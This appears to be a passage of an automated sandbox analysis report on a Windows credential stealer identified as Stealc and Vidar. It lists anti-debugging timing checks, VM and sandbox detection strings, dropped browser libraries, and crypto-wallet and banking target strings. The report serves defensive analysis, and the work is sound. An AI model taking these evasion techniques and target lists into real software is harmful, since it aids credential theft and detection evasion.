Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56163E second address: 561646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 561646 second address: 56166B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72110537B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007F72110537A6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56144E second address: 561460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F7210C23A0Eh 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 561460 second address: 561464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690C1 second address: 5690D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7210C23A0Eh 0x0000000a jno 00007F7210C23A06h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690D3 second address: 5690E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jp 00007F72110537A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690E0 second address: 5690EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jns 00007F7210C23A06h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569255 second address: 569262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569262 second address: 569279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7210C23A0Dh 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5693B8 second address: 5693BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5693BC second address: 5693C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569548 second address: 56954F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56954F second address: 56955F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7210C23A06h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569826 second address: 569842 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F72110537B3h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F72110537ABh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569842 second address: 56986D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7210C23A0Eh 0x00000007 jnp 00007F7210C23A06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F7210C23A10h 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57C5CA second address: 57C5E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007F72110537A6h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57C5E7 second address: 57C5EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5897E4 second address: 5897E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5897E8 second address: 5897EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58950F second address: 58951A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58951A second address: 58951E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59916F second address: 599173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5992B0 second address: 5992BA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7210C23A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5992BA second address: 5992CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F72110537A6h 0x0000000a jc 00007F72110537A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5992CA second address: 5992DF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7210C23A06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5992DF second address: 5992E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5992E3 second address: 599300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7210C23A15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 599582 second address: 5995A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F72110537B0h 0x0000000f jg 00007F72110537A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 599B0C second address: 599B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59E40C second address: 59E410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59FD78 second address: 59FD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7210C23A06h 0x0000000a jnp 00007F7210C23A06h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450293 second address: 54502DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72110537B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F72110537ABh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F72110537B6h 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 call 00007F72110537AEh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545034E second address: 5450375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7210C23A12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7210C23A0Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450375 second address: 545037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545037B second address: 545037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545037F second address: 545039E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F72110537B4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BF112 second address: 4BF117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450B6C second address: 5450B72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 301928 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 4B442E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 2FF16A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 4BAE26 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 544B30 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000B4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_000ADA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_000AE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_000ABE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_000B3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000AF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000A16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_000B38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_000AED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_000B4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000ADE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000A1160 GetSystemInfo,ExitProcess,

0_2_000A1160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: CFBFHIEB.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: CFBFHIEB.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: CFBFHIEB.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: CFBFHIEB.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: CFBFHIEB.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: CFBFHIEB.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CFBFHIEB.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: CFBFHIEB.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: CFBFHIEB.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: CFBFHIEB.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: CFBFHIEB.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: CFBFHIEB.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: CFBFHIEB.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: CFBFHIEB.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: CFBFHIEB.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: CFBFHIEB.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: CFBFHIEB.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: CFBFHIEB.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: CFBFHIEB.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: CFBFHIEB.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: CFBFHIEB.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: CFBFHIEB.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: CFBFHIEB.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: CFBFHIEB.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: CFBFHIEB.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: CFBFHIEB.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: CFBFHIEB.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2238243370.000000000137E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: CFBFHIEB.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000002.2238243370.00000000013C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW2?
Source: CFBFHIEB.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: CFBFHIEB.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: CFBFHIEB.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58391
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-59579
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58388
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58403
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58443
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58411

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C6B5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000A45C0 VirtualProtect ?,00000004,00000100,00000000

0_2_000A45C0

Source: C:\Users\user\Desktop\file.exe

0_2_000B9860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000B9750 mov eax, dword ptr fs:[00000030h]

0_2_000B9750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000B7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_000B7850

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C68B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C68B1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 1476, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000B9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_000B9600

Source: file.exe, file.exe, 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: u[Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C68B341 cpuid

0_2_6C68B341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_000B7B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000B6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_000B6920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000B7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_000B7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000B7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_000B7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2040063346.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2238243370.000000000137E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1476, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 1476, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
